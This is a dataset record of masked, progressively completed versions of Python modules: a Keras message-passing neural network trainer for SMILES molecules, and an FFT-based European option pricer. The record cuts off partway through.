self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\n<mask token>\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-3": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:\n List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols\n ), batch_size)]\n batches = [_merge_batch(c) for c in chunks]\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-4": "<mask token>\nfrom typing import List, Dict, Tuple\nimport numpy as np\nimport tensorflow as tf\nfrom molgym.mpnn.data import convert_nx_to_dict\nfrom molgym.mpnn.layers import custom_objects\nfrom molgym.utils.conversions import convert_smiles_to_nx\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:\n List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols\n ), batch_size)]\n batches = [_merge_batch(c) for c in chunks]\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-5": "\"\"\"Functions for updating and performing bulk inference using an Keras MPNN model\"\"\"\nfrom typing import List, Dict, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nfrom molgym.mpnn.data import convert_nx_to_dict\nfrom molgym.mpnn.layers import custom_objects\nfrom molgym.utils.conversions import convert_smiles_to_nx\n\n\n# TODO (wardlt): Make this Keras message object usable elsewhere\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n\n self.config = model.to_json()\n # Makes a copy of the weights to ensure they are not memoryview objects\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) -> tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects=custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) -> dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n\n # Convert arrays to array\n\n # Stack the values from each array\n batch = dict(\n (k, np.concatenate([np.atleast_1d(m[k]) for m in mols], axis=0))\n for k in mols[0].keys()\n )\n\n # Compute the mappings from bond index to graph index\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n\n # Compute offsets for the connectivity matrix\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str],\n atom_types: List[int], bond_types: List[str], batch_size: int = 128) -> np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n\n # Rebuild the model\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n\n # Convert all SMILES strings to batches of molecules\n # TODO (wardlt): Use multiprocessing. Could benefit from a persistent Pool to avoid loading in TF many times\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols), batch_size)]\n batches = [_merge_batch(c) for c in chunks]\n\n # Feed the batches through the MPNN\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\n# TODO (wardlt): Move to the MPNN library?\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types: List[str],\n outputs: List[float], batch_size: int, shuffle: bool = True, random_state: int = None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n\n super(GraphLoader, self).__init__()\n\n # Convert the molecules to MPNN-ready formats\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n\n # Other data\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n # Give it a first shuffle, if needed\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n # Get the desired chunk of entries\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n\n # Get the molecules and outputs out\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n # Get the number of batches\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n\n # Add a partially-full batch at the end\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\n# TODO (wardlt): Evaluate whether the model stays in memory after training. If so, clear graph?\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float], num_epochs: int,\n atom_types: List[int], bond_types: List[str], batch_size: int = 512,\n validation_split: float = 0.1, random_state: int = 1, learning_rate: float = 1e-3)\\\n -> Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n\n # Rebuild the model\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate), 'mean_absolute_error')\n\n # Separate the database into molecules and properties\n smiles, y = zip(*database.items())\n\n # Make the training and validation splits\n # Use a random number generator with fixed seed to ensure that the validation\n # set is never polluted with entries from the training set\n # TODO (wardlt): Replace with passing train and validation separately?\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n\n # Make the loaders\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types, y[train_split],\n batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types, y[~train_split],\n batch_size=batch_size, shuffle=False)\n\n # Run the desired number of epochs\n # TODO (wardlt): Should we use callbacks to get only the \"best model\" based on the validation set?\n history = model.fit(train_loader, epochs=num_epochs, validation_data=val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 14 01:32:26 2019
@author: himanshu
"""
import numpy as np
from scipy.interpolate import interp1d
from option import Option
class FFTPricing:
def __init__(self,
option : Option,
riskFreeRate,
volatility,
samplePoints,
bandwidth,
dampingFactor,
underlyingModel = 'GBM'):
self.__option = option
self.__r = riskFreeRate
self.__sigma = volatility
self.__N = samplePoints
self.__B = bandwidth
self.__alpha = dampingFactor
self.__model = underlyingModel
# Computes the characterstic function of a GBM.
def __charactersticFunc(self, omega):
S0 = self.__option.underlyingPrice
r = self.__r
T = self.__option.timeToExpiry
sigma = self.__sigma
alpha = self.__alpha
if self.__model == 'GBM':
x0 = np.log(S0)
mu = x0 + ((r - (sigma**2)/2)*(T))
sig = (sigma**2)*(T)/2
omega_prime = omega + 1j*(alpha+1)
return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))
elif self.__model == 'VG':
pass
# Computes the Fourier Transform of a GBM.
def __fourierTransform(self, omega):
alpha = self.__alpha
r = self.__r
T = self.__option.timeToExpiry
q_hat = self.__charactersticFunc(omega)
num = np.exp(-r*(T))*q_hat
den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)
return num/den
def optionPrice(self):
if not self.__option.expiryType == 'European':
print('Not a European Option')
return 0.0
K = self.__option.strikePrice
N = self.__N
B = self.__B
alpha = self.__alpha
h = B/(N-1)
omega = np.arange(0,N)*h
dk = 2*np.pi/(h*N)
k = np.log(20) + np.arange(0,N)*dk
dw = np.zeros(N)
dw[0] = h/2
dw[1:] = h
# FFT Algorithm
V = np.zeros(N)
for n in range(N):
nu_hat = self.__fourierTransform(omega)
inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)
V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real
val = interp1d(k, V)
return float('{0:.2f}'.format(val(np.log(K))))
def __repr__(self):
return "FFTPricing({}, {}, {}, {}, {}, {})"\
.format(self.__option,
self.__r,
self.__sigma,
self.__N,
self.__B,
self.__alpha)
if __name__ == "__main__":
from option import European
S0 = 100
K = 110
r = 0.10
T = 1
volatility = 0.25
N = 2**10
B = 50
alpha = 10.0
print('------------------------------------------------------------------'
+'----------------------------')
option = European(S0, K, T, 'Call')
fftPricing = FFTPricing(option, r, volatility, N, B, alpha)
print(fftPricing)
print('FFT price for Call:', fftPricing.optionPrice())
print('------------------------------------------------------------------'
+'----------------------------')
option = European(S0, K, T, 'Put')
fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)
print(fftPricing)
print('FFT price for Put:', fftPricing.optionPrice())
|
normal
|
{
"blob_id": "25987c15c28e3939f9f531dbc1d4bd9bf622b5a9",
"index": 5691,
"step-1": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n <mask token>\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B = 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n",
"step-4": "<mask token>\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = 